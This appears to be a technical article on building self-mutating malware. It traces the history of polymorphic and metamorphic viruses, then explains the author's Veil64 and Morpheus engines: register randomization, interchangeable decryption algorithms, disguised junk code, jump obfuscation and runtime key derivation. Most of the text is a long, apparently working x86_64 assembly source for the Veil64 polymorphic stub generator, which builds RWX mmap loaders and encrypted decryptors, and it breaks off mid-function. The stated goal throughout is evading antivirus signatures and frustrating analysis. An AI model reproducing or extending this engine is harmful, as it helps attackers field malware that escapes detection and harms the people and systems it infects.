Article Summary: This article systematically elaborates on the technical evolution and implementation principles of self-mutating malware, covering the core mechanisms of polymorphic and metamorphic engines. Through two concrete examples — Veil64 and Morpheus — the author "f00crew" from Hong Kong China, analyzes key techniques such as register randomization, algorithmic variants, and intelligent junk code injection. It emphasizes how mutation at the syntactic, structural, and semantic layers can evade signature-based detection while strictly adhering to the principle of behavioral conservation. The author points out that the essence of mutation technology is to keep functionality unchanged while infinitely varying the implementation method, and warns of risks such as code size inflation and stability issues.
Categories: Malware, Binary Security, Vulnerability Analysis, Red Teaming, Penetration Testing
The Art of Self-Mutating Malware
In the beginning, detection relied on signatures — a simple byte string that could uniquely identify a malicious sample. In that era, the process was straightforward: append the virus to the end of a file and patch the entry point. The AV industry quickly responded with signature databases, and for a period, the rhythm of this confrontation was predictable.
This article discusses how to implement self-mutating malicious code: how to build your own polymorphic engine, and some core ideas behind metamorphic code. For malicious code, self-mutation is one of the most elegant paths to solving the detection problem. You no longer just hide yourself — you become “another you” with every replication. This is the purest form of digital evolution.
The concepts we discuss do not depend on any specific implementation. Although the article uses real examples and practical principles from code I have written, the real value lies in understanding the underlying theory of “why mutation is feasible.”
Let’s go back to the beginning. Early VX practices were crude: they directly overwrote files and caused destruction. Some samples would first run the original program and then deliver their own payload. AV quickly caught up, mainly relying on signature scanning to catch samples.
The VX community evolved accordingly and began encrypting their code. The payload remained encrypted and was only unpacked at runtime. AV then turned its attention to the decryptor, so VX authors began dynamically transforming decryption routines. Some families even automatically rotated decryptors — this type later became known as oligomorphic.
Around 1985 to 1990, AV dominated with static signature scanning: string matching and fixed byte patterns made samples easy to hit once they landed on disk. By the early 1990s, the situation began to change. Virus bodies started to be encrypted, exposing only a decryption stub. This stub immediately became AV’s primary hunting target and spurred the development of wildcard and heuristic scanning.
Then polymorphic viruses appeared. The virus would automatically generate a new decryptor at creation time or during each infection. Each instance had its own encryption/decryption routine and evaded scanning by rearranging machine code. This was the typical feature from 1995 to 2000: the same virus, infinite appearances. Dark Avenger’s MtE engine completely rewrote the rules of this game.
After that, metamorphic viruses emerged. They no longer relied on an encryption shell. They would rewrite the entire body with every infection. Code structure, control flow, and register usage would all change, but the payload remained unchanged. Between 2000 and 2005, metamorphic samples like Zmist and Simile raised the bar even higher: there was no fixed decryptor to track — only continuous code mutation.
Metamorphic code changes everything, not just the decryptor. It evolved from polymorphism but upgraded from “encryption camouflage” to “overall code reshaping.” Detection difficulty is extremely high; implementation difficulty is equally high, especially at the assembly level.
Overview
When it comes to self-modifying loaders, you have two paths. The first is to keep it small and aggressive: build a lightweight, fast loader that only performs “just enough” mutation — tweak a few places here, quickly shuffle a few there — to slip past scanners without triggering obvious alerts. The code remains compact and raw, but reliable enough.
The other path is full metamorphosis. The loader no longer just fine-tunes itself; it disassembles and rebuilds itself. Layouts are rearranged, instructions are scattered, and entirely new encryption is used on every run. Even if reverse engineers and AV capture one version, the next version will look like a completely unfamiliar sample.
This is not magic. Making it run stably after every mutation is extremely difficult. You must build in validation: count instructions, verify jumps, and perform sanity checks on every change — otherwise it will crash immediately. Even more troublesome is that code size can balloon out of control, eventually losing practicality.
Before discussing specific techniques, we must first clarify: when we talk about executable code, what does “mutation” really mean? It is not just “changing a few bytes,” but the relationship between “form and function,” and how far this relationship can be stretched without destroying behavior.
— The Essence of Identity —
What exactly makes a program “itself”? Is it the order of instructions? Register usage? Memory layout? Or something deeper, like intent?
Mutation’s answer is: identity does not lie in what the code looks like, but in what the code does. As long as two binaries produce the same output for the same input, they are functionally equivalent — even if their assembly is completely different.
Version A: Version B: Version C:
mov eax, 0 xor eax, eax sub eax, eax
inc ebx add ebx, 1 lea ebx, [ebx+1]
Bytes: Bytes: Bytes:
B8 00 00 00 00 43 31 C0 83 C3 01 29 C0 8D 5B 01
Three completely different byte patterns that produce identical behavior. This was my “eureka moment” and the starting point for all subsequent implementations.
The core insight is: a program’s identity is not its bytes, but its behavior. If I can generate infinitely many patterns that keep behavior unchanged while making bytes different, signature-based detection will be continuously undermined.
But this also raises harder questions:
- How to systematically generate equivalent code?
- How to guarantee correctness across mutations?
- How to make variants truly unpredictable?
These three questions directly shaped the design of my two engines. They explore different paths to “mutation,” and we call them Veil64 and Morpheus.
Veil64 is a polymorphic code generator used to produce infinite variants of decryption routines: same functionality, infinite forms. Morpheus is a file infector that truly rewrites its own code during execution.
This is the core idea. Everything else is built on top of it: if you cannot hide what is done, then make how it is done unpredictable.
Signatures are the byte patterns that AV focuses on tracking — the “high-risk” digital footprints. Strings, code fragments, hashes — anything that can mark malware will be used. Encryption is a key technique here: it scrambles these recognizable markers, making it difficult for AV to hit them.
Then there is the payload, the part that actually executes the malicious logic. It usually does not run alone but is bound to a stub. This small module decrypts and launches the payload in memory. Because the payload itself is encrypted, AV has difficulty hitting it statically and instead targets the stub. The advantage is that the stub is small and easy to continuously mutate, allowing it to constantly bypass old rules.
This turns the confrontation into a “one-to-many” game, and this mathematical relationship naturally favors the mutation side. Each new variant has a chance to break old detection rules, burn old signatures, and continue to lurk.
“What starts as polymorphic finishes as metamorphic.”
— Levels of Mutation —
Mutation is not just surface-level change — it occurs across layers, including syntactic, structural, and semantic reconstruction.
First, syntactic mutation (grammar-level mutation). This is the outermost layer: replacing equivalent instructions, randomizing register usage, and reordering operations. Appearance changes, result remains the same.
Original: mov eax, [ebx+4]
Mutated: push ebx
add ebx, 4
mov eax, [ebx]
sub ebx, 4
pop ebx
Both snippets load the value at [ebx+4] into eax, but the instruction paths are completely different.
Deeper is structural mutation (structure-level mutation). The change is more profound: reconnecting control flow, rewriting data structures, or even replacing entire algorithms with “different paths but equivalent results.”
The deepest is semantic mutation (semantic-level mutation). It splits functions and reorganizes logic into behaviorally equivalent bodies while ensuring the original intent remains unchanged.
— The Conservation Principle —
No matter how aggressive the mutation, there is one non-negotiable constraint: the program’s semantic behavior must be preserved. What is done (functional output) must remain unchanged; only how it is done (internal implementation mechanism) can change.
The genotype (underlying code structure) can freely drift, mutate, and be obfuscated; the phenotype (externally observable behavior) must remain constant. All mutation techniques can only operate within this boundary.
Naive Approaches
Polymorphism is the purest form of mutation. It essentially expresses the same thing in a thousand different ways. Like a chameleon with a clear goal: core behavior is locked, while everything else continuously changes. No fixed identity, only endless variants.
My first serious attempt to break signature detection was Veil64: a polymorphic code generator capable of generating infinite different ways to write the same decryption logic. The goal was simple: encrypt the payload differently every time and ensure the decryptor never appears the same twice.
— Core Challenges —
Constructing code that can correctly decrypt every time but looks different each time is non-trivial. Every generation must be compact, fast, clean, highly efficient, without leaving obvious patterns, and resistant to both static and dynamic analysis.
I started with a simple two-stage design, and understanding this split is key to why it works. The first layer is the stub: a minimal piece of code responsible for memory allocation and decrypting the embedded engine. The second layer is the engine itself: the polymorphic decryptor that actually handles the payload.
┌─────────────────┐
│ Stub Code │ (119-200 bytes)
├─────────────────┤
│ Encrypted Engine│ (176-300 bytes)
├─────────────────┤
│ Padding │
└─────────────────┘
Why use two stages? Because this allows the polymorphic engine itself to be encrypted. The stub is small and simple, so even with variants, the signature surface is limited. The real polymorphic power resides in the engine. By encrypting the engine and embedding it inside the stub, complex and variable code is hidden until runtime.
The overall flow is as follows: you call genrat() with a buffer, size, and seed key. The engine first generates a runtime key using multiple entropy sources: RDTSC provides hardware timing, stack pointer provides process differences, and RIP provides position-related randomness. It then builds the polymorphic engine, including random register allocation, selection among four algorithmic variants, and intelligent junk code injection.
Next comes the stub generation stage. Multiple mmap syscall initialization variants are generated, RIP-relative addressing is handled for position independence, and the encrypted engine is embedded. Finally, everything is encrypted and assembled into executable code.
The clever part is that the stub and engine change independently. Even if someone creates a signature for a stub variant, the internal encrypted engine is different every time. Even if they manage to extract and analyze the engine, the next generation will use a completely different set of registers and algorithms.
— The Four Pillars of Polymorphism —
Never use the same set of registers twice.
Hard-coded registers are signature bait. If your decryptor always uses EAX as a counter and EBX as a data pointer, you are practically exposing yourself. Such patterns will be quickly flagged, so the engine randomizes register usage on every generation.
But this is not random grabbing. The selection process avoids conflicts, skips RSP to prevent stack corruption, and ensures no register takes on multiple roles. The underlying logic looks roughly like this:
get_rr:
call next_random
and rax, 7
cmp al, REG_RSP ; Never use stack pointer
je get_rr
cmp al, REG_RAX ; Avoid RAX conflicts
je get_rr
mov [rel reg_base], al ; Store base register
.retry_count:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_count
cmp al, [rel reg_base] ; Ensure no conflicts
je .retry_count
mov [rel reg_count], al
This process is repeated for key registers and all registers used in junk code. Even before considering algorithms and junk injection, there are already 210 possible register combinations. That means the same register-level operation can have 210 different appearances — all completely distinct to a signature scanner.
One variant might use RBX for data, RCX for counting, and RDX for the key. The next might switch to RSI for data, RDI for counting, and RBX for the key. Yet another could use extended registers R8, R9, R10. Every combination is functionally equivalent, but the opcode patterns are completely different.
— Four Ways to Say the Same Thing —
Register randomization is only the starting point. True depth comes from algorithmic polymorphism. We do not fix a single decryption flow but cycle between four equivalent algorithms: same output, completely different instruction streams.
This is not simply swapping XOR for ADD. Each variant is carefully designed to guarantee correctness while maximizing signature dispersion.
- Algorithm 0: ADD → ROL → XOR
- Algorithm 1: XOR → ROL → XOR
- Algorithm 2: SUB → ROR → XOR
- Algorithm 3: XOR → ADD → XOR
All four algorithms produce identical final results, but their instruction sequences and opcode patterns are entirely different.
Each algorithm has a corresponding inverse process in the encryption phase. For example, if encryption uses XOR → ROR → SUB, decryption uses ADD → ROL → XOR. Mathematically they cancel perfectly, but the instruction flows never look the same. Opcode patterns, instruction lengths, and register usage all change. To a signature scanner, they appear as completely different routines.
— Intelligent Junk Code —
Most polymorphic engines fail here: they either stuff random bytes or pile on obvious NOP sleds, practically shouting “I’m malware.” That is low-level. True polymorphism uses “intentional-looking” junk code that blends into the context and mimics normal compiler output.
Junk injection is not purely random — it is structured. It uses no-net-effect PUSH/POP pairs that look like register preservation, XOR reg, reg to imitate common zeroing initialization, and MOV reg, reg that resembles typical compiler register shuffling.
This is just a very basic example. Some engines do it more aggressively. The key point is to make it look like real developer code. PUSH RAX followed by POP RBX can masquerade as register saving and transfer; XOR RAX, RAX looks like legitimate initialization; MOV RAX, RAX resembles dead code left by an optimizer. Functionally they add no value, but visually they blend in.
Junk injection also deliberately varies in density: sometimes heavy, sometimes sparse; sometimes clumped, sometimes scattered in loops. There is no fixed “junk zone” that can be isolated — only code that looks normal every single time.
— Breaking Linear Analysis —
Static analysis relies on linear flow: traversing code, building graphs, and extracting patterns. So we break it. Random jumps are inserted to skip over junk regions, directly destroying straight-line logic.
Jump generation is subtle. Sometimes 2-byte short jumps, sometimes 5-byte long jumps; they may skip only 1 byte or over a dozen. The skipped junk content is randomized every time. Even if the analyzer follows the jump path, its rhythm is disrupted on every run.
This produces unpredictable control flow and interferes with both static and dynamic analysis. Static tools face non-linear instruction streams mixed with random data; dynamic tools encounter different execution paths on every run, making it difficult to build a stable behavioral profile.
These jumps also serve a dual purpose: they mimic compiler output. Real compiled code is full of branches, jumps, and irregular flow. Injecting our own jumps increases this “natural complexity,” helping the code blend more seamlessly.
— The Entropy Problem —
Hard-coded keys or constants are traps. I learned this the hard way: early versions embedded the constant 0xDEADBEEF in every variant. No matter how much the rest of the code changed, that fixed value instantly became a red flag.
The solution is runtime key generation: no fixed constants, no repetition, no nail-down patterns. The key is reconstructed on every execution, drawing from multiple entropy sources that vary with execution round, process, and machine.
Entropy comes from multiple sources. RDTSC provides high-resolution microsecond-level timing; the stack pointer changes with processes and function calls; RIP brings position-related randomness under ASLR; the user key introduces input-driven variation.
The real strength lies in how these values are combined. It is not simple XOR, but involves rotations, complements, and mixing with stack-related values. Each transformation step depends on the current state, forming a dependency chain that ultimately produces a truly unpredictable key.
— Randomness Is Critical —
Excellent polymorphic capability depends on high-quality randomness. Many engines use basic linear congruential generators or simple incrementing counters — both easily produce predictable patterns that can be flagged. I prefer the XorShift PRNG: fast, long period (2^64−1), and passes strong statistical randomness tests without repeating for a very long time.
Under ASLR, code is loaded at different addresses each time. Hard-coded absolute addresses will cause the polymorphic decryptor to fail if it lands in an unexpected location. The solution is RIP-relative addressing, with offsets calculated based on the current instruction pointer.
— Just-in-Time Machine Code Generation —
This is where we reach the real core. You cannot simply rearrange pre-written assembly and call it polymorphic. The engine generates raw x64 machine code on the fly, building every instruction byte by byte. Opcodes and operands are computed dynamically based on the current register allocation and algorithm choice.
The ModRM byte is especially critical in x64: it encodes which registers are used. By calculating this byte dynamically, the engine can implement the same operation with any register combination, producing different bytes — and therefore different signatures.
The same polymorphic thinking applies to all syscall parameters. Multiple construction methods are used to avoid pattern matching.
— Performance and Scalability —
Basic generation averages 9 to 13 milliseconds per variant, translating to 50,000 to 75,000 variants per minute — enough to overwhelm signature detection. Speed is not higher because each variant undergoes register renaming, flow randomization, intelligent junk injection, and anti-debug checks.
Generation time fluctuates by ±3 to 4 ms by design to avoid predictability; stable timing would aid detection. The engine maintains this jitter by varying instruction order, junk block size, and encryption rounds.
Static memory footprint is approximately 340 to 348 KB — far larger than toy 4 KB engines. This includes precomputed transformation tables, runtime mutation logic, and anti-emulation traps. Per-variant memory usage remains stable with no leaks or growth.
Code size fluctuates between 180 bytes and 1.2 KB. Compact variants favor speed; balanced variants strike a compromise; complex variants maximize complexity to stress AV engines.
— What Variants Look Like —
Variant #1: Size 335, Key 0x4A4BDC5C3AEAC0AD
48 C7 C0 0A 00 00 00 mov rax, 10
48 FF C8 dec rax
50 push rax
58 pop rax
90 nop
48 31 FF xor rdi, rdi
...
Variant #2: Size 368, Key 0x6BAAA583D73FA32B
50 push rax
58 pop rax
50 push rax
58 pop rax
48 31 C0 xor rax, rax
48 83 C0 09 add rax, 9
...
Variant #3: Size 385, Key 0x5C3F1EDF85C0D55E
90 nop
90 nop
50 push rax
58 pop rax
48 C7 C0 09 00 00 00 mov rax, 9
...
Look at the differences. Variant #1 sets RAX by loading 10 then decrementing. Variant #2 uses PUSH/POP junk first, then XOR/ADD. Variant #3 starts with NOPs, inserts another set of junk, then loads directly. The result is the same (RAX = 9), but the method is completely different.
Size fluctuation is large. These three samples differ by less than 50 bytes. In reality, the engine can produce variants from compact 180-byte versions to large 1200-byte versions, depending on the intensity of junk injection and obfuscation.
The engine classifies variants into three categories by structure and complexity. Compact types (≈295–350 bytes) minimize junk and prioritize speed; balanced types (up to 400 bytes) compromise between obfuscation and stability; complex types (up to 500 bytes) layer more polymorphic techniques and anti-analysis features.
With four algorithms combined with 210 register permutations, there are already 840 base variants before adding junk and control-flow obfuscation. Introducing variable junk injection, diverse jump patterns, and multiple stub initialization methods expands the variant space into the millions.
The key is not just quantity, but “functional equivalence + signature diversity.” Every variant can correctly decrypt the payload, yet appears distinctly different from a signature-detection perspective.
Effective polymorphism maximizes signature diversity without degrading correctness. Generating billions of variants is meaningless if many are broken or still share detectable patterns. Correctness and diversity scale must hold simultaneously.
— Built-in Anti-Analysis Design —
Emulation engines usually struggle with variable timing, and junk code injection creates unpredictable execution durations. Key generation dependent on stack state makes the same variant behave differently across process contexts. Reliance on hardware timestamps further increases emulation cost because it requires accurate RDTSC simulation.
With no fixed constants or strings, static analysis tools struggle because there are almost no grep-able or fingerprintable anchors. Polymorphic control flow breaks linear analysis, while the encrypted embedded engine hides core logic until runtime.
Dynamic analysis is also disrupted by “legitimate-looking, functionally neutral” junk code. Multiple execution paths generate different behavioral traces on every run. Runtime key derivation ensures each execution has a unique key, making results difficult to reuse even if tracing succeeds.
Anti-analysis features are not optional — they are part of the system. Every polymorphic technique serves two purposes simultaneously: evading signatures and increasing analysis cost.
Veil64 Full Source Code
;------------------------------------------------------------
; [ V E I L 6 4 ]
;------------------------------------------------------------
; Type: Polymorphic Engine / Stub Generator
; Platform: x86_64 Linux
; Size: ~4KB Engine + Custom Stub
; Runtime shellcode obfuscation, encryption,
; and stealth execution via mmap + RIP tricks.
;
; 0xf00sec
;------------------------------------------------------------
section .text
global genrat
global exec_c
global _start
; x64 opcodes
%define PUSH_REG 0x50
%define POP_REG 0x58
%define ADD_MEM_REG 0x01
%define ADD_REG_IMM8 0x83
%define ROL_MEM_IMM 0xC1
%define XOR_MEM_REG 0x31
%define TEST_REG_REG 0x85
%define JNZ_SHORT 0x75
%define JZ_SHORT 0x74
%define CALL_REL32 0xE8
%define JMP_REL32 0xE9
%define JMP_SHORT 0xEB
%define RET_OPCODE 0xC3
%define NOP_OPCODE 0x90
%define JNZ_LONG 0x0F85
%define FNINIT_OPCODE 0xDBE3
%define FNOP_OPCODE 0xD9D0
; register encoding
%define REG_RAX 0
%define REG_RCX 1
%define REG_RDX 2
%define REG_RBX 3
%define REG_RSP 4
%define REG_RBP 5
%define REG_RSI 6
%define REG_RDI 7
section .data
stub_key: dq 0xDEADBEEF ; runtime key
sec_key: dq 0x00000000
engine_size: dq 0
dcr_eng: dq 0
stub_sz: dq 0
sz: dq 0
seed: dq 0 ; PRNG state
p_entry: dq 0 ; output buffer
key: dq 0 ; user key
reg_base: db 0 ; selected registers
reg_count: db 0
reg_key: db 0
junk_reg1: db 0 ; junk registers
junk_reg2: db 0
junk_reg3: db 0
prolog_set: db 0
fpu_set: db 0
jmp_back: dq 0
alg0_dcr: db 0 ; algorithm selector
align 16
entry:
times 4096 db 0 ; engine storage
exit:
section .text
; main generator entry point
genrat:
push rbp
mov rbp, rsp
sub rsp, 64
push rbx
push r12
push r13
push r14
push r15
test rdi, rdi ; validate params
jz .r_exit
test rsi, rsi
jz .r_exit
cmp rsi, 1024 ; min buffer size
jb .r_exit
mov [rel p_entry], rdi
mov [rel sz], rsi
mov [rel key], rdx
call gen_runtm ; generate runtime keys
lea rdi, [rel entry]
mov r12, rdi
call gen_reng ; build engine
mov rax, rdi ; calculate engine size
sub rax, r12
mov [rel engine_size], rax
mov rdi, [rel p_entry]
call unpack_stub ; build stub
call enc_bin ; encrypt payload
mov rax, [rel stub_sz] ; total
test rax, rax
jnz .calc_sz
mov rax, rdi
sub rax, [rel p_entry]
.calc_sz:
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 64
pop rbp
ret
.r_exit:
xor rax, rax
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 64
pop rbp
ret
; generate engine
gen_reng:
push rdi
push rsi
push rcx
rdtsc
xor rax, [rel key]
mov rbx, 0x5DEECE66D
xor rax, rbx
mov rbx, rax
shl rbx, 13
xor rax, rbx
mov rbx, rax
shr rbx, 17
xor rax, rbx
mov rbx, rax
shl rbx, 5
xor rax, rbx
xor rax, rsp
mov [rel seed], rax
push rdi ; clear state
lea rdi, [rel reg_base]
mov rcx, 16
xor rax, rax
rep stosb
pop rdi
pop rcx
pop rsi
pop rdi
call get_rr ; select random registers
call set_al ; pick decrypt algorithm
call gen_p ; generate prologue
call yes_no ; random junk insertion
test rax, rax
jz .skip_pr
call gen_trash
.skip_pr:
call trash
call yes_no
test rax, rax
jz .skip_dummy
call gen_dummy
.skip_dummy:
call gen_dec ; main decrypt loop
call yes_no
test rax, rax
jz .skip_prc
call gen_trash
.skip_prc:
mov al, RET_OPCODE
stosb
cmp qword [rel jmp_back], 0 ; conditional jump back
je .skip_jmp
mov ax, JNZ_LONG
stosw
mov rax, [rel jmp_back]
sub rax, rdi
sub rax, 4
stosd
.skip_jmp:
call trash
mov al, RET_OPCODE
stosb
ret
; encrypt generated engine
enc_bin:
push rdi
push rsi
push rcx
push rax
push rbx
lea rdi, [rel entry]
mov rcx, [rel engine_size]
; validate engine size
test rcx, rcx
jz .enc_done
cmp rcx, 4096
ja .enc_done
cmp rcx, 10
jb .enc_done
; encrypt in place
mov rax, [rel stub_key]
mov rsi, rcx
.enc_loop:
test rsi, rsi
jz .enc_done
xor byte [rdi], al
rol rax, 7
inc rdi
dec rsi
jmp .enc_loop
.enc_done:
pop rbx
pop rax
pop rcx
pop rsi
pop rdi
ret
; build stub wrapper
unpack_stub:
push rbx
push rcx
push rdx
push r12
mov r12, rdi
call bf_boo ; bounds check
jae .stub_flow
call stub_trash
call gen_stub_mmap
call stub_decrypt
mov rax, rdi
sub rax, r12
mov [rel stub_sz], rax
call stub_trash
; update size after junk
mov rax, rdi
sub rax, r12
; check space for encrypted engine
mov rbx, rax
add rax, [rel engine_size]
cmp rax, [rel sz]
ja .stub_flow
; embed encrypted engine
lea rsi, [rel entry]
mov rcx, [rel engine_size]
test rcx, rcx
jz .skip_embed
rep movsb
.skip_embed:
; final size calculation
mov rax, rdi
sub rax, r12
mov [rel stub_sz], rax
pop r12
pop rdx
pop rcx
pop rbx
ret
.stub_flow:
xor rax, rax
mov [rel stub_sz], rax
pop r12
pop rdx
pop rcx
pop rbx
ret
; generate stub junk
stub_trash:
call next_random
and rax, 7 ; 0-7 junk instructions
mov rcx, rax
test rcx, rcx
jz .no_garbage
.trash_loop:
call next_random
and rax, 3 ; choose junk type
cmp al, 0
je .gen_nop
cmp al, 1
je .gen_push_pop
cmp al, 2
je .gen_xor_self
jmp .gen_mov_reg
.gen_nop:
mov al, 0x90
stosb
jmp .next_garbage
.gen_push_pop:
mov al, 0x50 ; push rax
stosb
mov al, 0x58 ; pop rax
stosb
jmp .next_garbage
.gen_xor_self:
mov al, 0x48 ; rex.w
stosb
mov al, 0x31 ; xor rax,rax
stosb
mov al, 0xC0
stosb
jmp .next_garbage
.gen_mov_reg:
mov al, 0x48 ; rex.w
stosb
mov al, 0x89 ; mov rax,rax
stosb
mov al, 0xC0
stosb
.next_garbage:
loop .trash_loop
.no_garbage:
ret
; generate mmap syscall stub
gen_stub_mmap:
; mmap setup
call next_random
and rax, 3 ; choose method
cmp al, 0
je .mmap_method_0
cmp al, 1
je .mmap_method_1
cmp al, 2
je .mmap_method_2
jmp .mmap_method_3
.mmap_method_0:
; mov rax, 9
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 9 ; mmap syscall
stosd
jmp .mm_continue
.mmap_method_1:
; xor rax,rax; add rax,9
mov al, 0x48
stosb
mov al, 0x31
stosb
mov al, 0xC0
stosb
mov al, 0x48
stosb
mov al, 0x83
stosb
mov al, 0xC0
stosb
mov al, 9
stosb
jmp .mm_continue
.mmap_method_2:
; mov rax,10; dec rax
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 10
stosd
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC8
stosb
jmp .mm_continue
.mmap_method_3:
; mov rax,18; shr rax,1
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 18
stosd
mov al, 0x48
stosb
mov al, 0xD1
stosb
mov al, 0xE8
stosb
.mm_continue:
call stub_trash
; rdi setup
call next_random
and rax, 1
test rax, rax
jz .rdi_method_0
; mov rdi,0
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC7
stosb
mov eax, 0
stosd
jmp .rdi_done
.rdi_method_0:
; xor rdi,rdi
mov al, 0x48
stosb
mov al, 0x31
stosb
mov al, 0xFF
stosb
.rdi_done:
; mov rsi,4096
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC6
stosb
mov eax, 4096
stosd
; mov rdx,7 (rwx)
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC2
stosb
mov eax, 7
stosd
; mov r10,0x22 (private|anon)
mov al, 0x49
stosb
mov al, 0xC7
stosb
mov al, 0xC2
stosb
mov eax, 0x22
stosd
; mov r8,-1
mov al, 0x49
stosb
mov al, 0xC7
stosb
mov al, 0xC0
stosb
mov eax, 0xFFFFFFFF
stosd
; mov r9,0
mov al, 0x4D
stosb
mov al, 0x31
stosb
mov al, 0xC9
stosb
; syscall
mov al, 0x0F
stosb
mov al, 0x05
stosb
ret
; generate decryption stub
stub_decrypt:
; mov rbx,rax (save mmap result)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xC3
stosb
; calculate RIP-relative offset to embedded engine
mov r15, rdi
mov rax, [rel p_entry]
mov rdx, [rel stub_sz]
test rdx, rdx
jnz .usszz
; fallback calculation
mov rdx, rdi
sub rdx, [rel p_entry]
add rdx, 100
.usszz:
add rax, rdx ; engine position
; RIP-relative calculation
mov rbx, r15
add rbx, 7 ; after LEA instruction
sub rax, rbx
; lea rsi,[rip+offset]
mov al, 0x48
stosb
mov al, 0x8D
stosb
mov al, 0x35
stosb
stosd
; mov rcx,engine_size
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC1
stosb
mov rax, [rel engine_size]
test rax, rax
jnz .engine_sz
mov rax, 512
.engine_sz:
cmp rax, 65536
jbe .size_ok
mov rax, 65536
.size_ok:
stosd
; mov rdx,stub_key
mov al, 0x48
stosb
mov al, 0xBA
stosb
mov rax, [rel stub_key]
stosq
; decryption loop
mov r14, rdi
; test rcx,rcx
mov al, 0x48
stosb
mov al, 0x85
stosb
mov al, 0xC9
stosb
; jz done
mov al, 0x74
stosb
mov al, 0x10
stosb
; xor [rsi],dl
mov al, 0x30
stosb
mov al, 0x16
stosb
; rol rdx,7
mov al, 0x48
stosb
mov al, 0xC1
stosb
mov al, 0xC2
stosb
mov al, 7
stosb
; inc rsi
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC6
stosb
; dec rcx
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC9
stosb
; jmp loop
mov al, 0xEB
stosb
mov rax, r14
sub rax, rdi
sub rax, 1
neg al
stosb
; copy to allocated memory
; mov rdi,rbx
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xDF
stosb
; calculate engine position
mov rax, [rel p_entry]
mov rbx, [rel stub_sz]
add rax, rbx
; RIP-relative offset
mov rbx, rdi
add rbx, 7
sub rax, rbx
; lea rsi,[rip+offset]
mov al, 0x48
stosb
mov al, 0x8D
stosb
mov al, 0x35
stosb
stosd
; mov rcx,engine_size
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC1
stosb
mov rax, [rel engine_size]
test rax, rax
jnz .engine_sz2
mov rax, 256
.engine_sz2:
stosd
; rep movsb
mov al, 0xF3
stosb
mov al, 0xA4
stosb
mov al, RET_OPCODE
stosb
ret
bf_boo:
push rbx
mov rax, rdi
sub rax, [rel p_entry]
add rax, 300
cmp rax, [rel sz]
pop rbx
ret
; generate runtime keys
gen_runtm:
push rbx
push rcx
rdtsc ; entropy from RDTSC
shl rdx, 32
or rax, rdx
xor rax, [rel key] ; mix with user key
mov rbx, rsp ; stack entropy
xor rax, rbx
call .get_rip ; RIP entropy
.get_rip:
pop rbx
xor rax, rbx
rol rax, 13
mov rbx, rax ; dynamic constant
ror rbx, 19
xor rbx, rsp
add rax, rbx
mov rbx, rax ; dynamic XOR
rol rbx, 7
not rbx
xor rax, rbx
mov [rel stub_key], rax
rol rax, 7 ; secondary key
mov rbx, 0xCAFE0F00
shl rbx, 32
or rbx, 0xDEADC0DE
xor rax, rbx
mov [rel sec_key], rax
mov rax, [rel stub_key] ; ensure different from user key
cmp rax, [rel key]
jne .keys_different
not rax
mov [rel stub_key], rax
.keys_different:
pop rcx
pop rbx
ret
; PRNG
next_random:
push rdx
mov rax, [rel seed]
mov rdx, rax
shl rdx, 13
xor rax, rdx
mov rdx, rax
shr rdx, 17
xor rax, rdx
mov rdx, rax
shl rdx, 5
xor rax, rdx
mov [rel seed], rax
pop rdx
ret
random_range:
push rdx
call next_random
pop rcx
test rcx, rcx
jz .range_zero
xor rdx, rdx
div rcx
mov rax, rdx
ret
.range_zero:
xor rax, rax
ret
; random boolean
yes_no:
call next_random
and rax, 0xF
cmp rax, 7
setbe al
movzx rax, al
ret
; select random registers
get_rr:
call next_random
and rax, 7
cmp al, REG_RSP
je get_rr
cmp al, REG_RAX ; avoid rax as base
je get_rr
mov [rel reg_base], al
.retry_count:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_count
cmp al, REG_RAX ; avoid rax as count
je .retry_count
cmp al, [rel reg_base]
je .retry_count
mov [rel reg_count], al
.retry_key:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_key
cmp al, [rel reg_base]
je .retry_key
cmp al, [rel reg_count]
je .retry_key
mov [rel reg_key], al
.retry_junk1:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk1
mov [rel junk_reg1], al
.retry_junk2:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk2
cmp al, [rel junk_reg1]
je .retry_junk2
mov [rel junk_reg2], al
.retry_junk3:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk3
cmp al, [rel junk_reg1]
je .retry_junk3
cmp al, [rel junk_reg2]
je .retry_junk3
mov [rel junk_reg3], al
ret
; select algorithm
set_al:
call next_random
and rax, 3
mov [rel alg0_dcr], al
ret
; generate prologue
gen_p:
call gen_jmp
call trash
call yes_no
test rax, rax
jz .skip_trash1
call trash
.skip_trash1:
; mov reg_key,key
call gen_jmp
mov al, 0x48
stosb
mov al, 0xB8
add al, [rel reg_key]
stosb
mov byte [rel prolog_set], 1
mov rax, [rel key]
stosq
call yes_no
test rax, rax
jz .skip_trash2
call trash
.skip_trash2:
ret
; generate decrypt loop
gen_dec:
mov [rel jmp_back], rdi
call trash
call gen_jmp
; mov reg_base,rdi (data pointer)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xF8
add al, [rel reg_base]
stosb
call trash
call gen_jmp
; mov reg_count,rsi (size)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xF0
add al, [rel reg_count]
stosb
call trash
call gen_jmp
.decr_loop:
movzx rax, byte [rel alg0_dcr]
cmp al, 0
je .gen_algo_0
cmp al, 1
je .gen_algo_1
cmp al, 2
je .gen_algo_2
jmp .gen_algo_3
.gen_algo_0:
; add/rol/xor
call gen_add_mem_key
call trash
call gen_trash
call gen_rol_mem_16
call trash
call gen_trash
